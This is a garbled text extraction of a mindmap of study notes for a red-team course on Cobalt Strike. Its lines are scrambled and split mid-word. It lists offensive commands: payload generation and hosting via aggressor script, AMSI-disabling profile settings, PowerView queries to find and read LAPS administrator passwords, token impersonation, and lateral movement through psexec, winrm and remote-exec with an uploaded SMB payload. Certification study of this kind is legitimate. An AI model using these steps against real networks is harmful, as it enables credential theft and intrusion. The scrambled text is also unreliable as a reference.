CRTO Mindmap
CRTO Mindmap
Port = 80/443
Port = XXXX
TCP
Yes = tcp-local (127.0.0.1)
Bind to localhost only
Beacon => Beacon
P2P No = tcp (0.0.0.0)
SVCPIPE-5a71ebb3-cc01-49a9-bd85-
T
4bbd37495169
Generate .hta
HTA (HTML Application)
s udo vim
/etc/systemd/system/teamserver.service
Running As a Service
payload = artifact_payload("listener_
$
Headless CS agscript name", "payload_type", "arch"); owershell Get-DomainGPO | ? { $_.DisplayName -like "*laps*" } |
p
select DisplayName, Name, GPCFileSysPath | fl
on ready{...} event gpcfilesyspath
script.cna s ite_host("ip_server", port, "/resource", $
payload, "text/plain", "description", false);
owershell Get-DomainComputer | Get-DomainObjectAcl -ResolveGUIDs | ? { $_.ObjectAceType -eq "ms-Mcs-
p
AdmPwd" -and $_.ActiveDirectoryRights -match "ReadProperty" } | select ObjectDn, SecurityIdentifier
./build.sh pipe VirtualAlloc 277492 5 false
false /mnt/c/Tools/cobaltstrike/artifacts LAPS Powerview Principals allowed to read Password
Disk Artifact Kit powershell ConvertFrom-SID S-1-5-21-569305411-121244042-2357301523-1107
System
Cobalt Strike > Script Manager > Load psexec/psexec64
./build.sh /mnt/c/Tools/cobaltstrike/ powershell Get-DomainComputer | ? { $_."ms-Mcs-AdmPwdExpirationTime" -ne $null } | select dnsHostName
resources Computers with LAPS
jump [method] [target] [listener(SMB)] psexec_psh (32bits)
Memory Resource Kit jump
powershell Get-DomainComputer -Identity <Computer> -Properties ms-Mcs-AdmPwd make_token .\LAPSAdmin Password
winrm/winrm64
ost-ex {
p Read password
Bypass set amsi_disable "true";
winrm
owershell-import C:\Tools\LAPSToolkit\
p
set spawnto_x64 "%windir%\\ LAPSToolkit.ps1
sysnative\\dllhost.exe"; psexec
set spawnto_x86 "%windir%\\ LAPSToolkit remote-exec [method] [target] [command]
powershell Find-LAPSDelegatedGroups remote-exec
syswow64\\dllhost.exe"; cd \\target\share$
} ./c2lint c2-profiles/normal/webbug.profile Restart
Cobalt Profile
upload paylaod-smb.exe
Movimiento lateral wmi link target pipe
SQLColumnSampleDataThreaded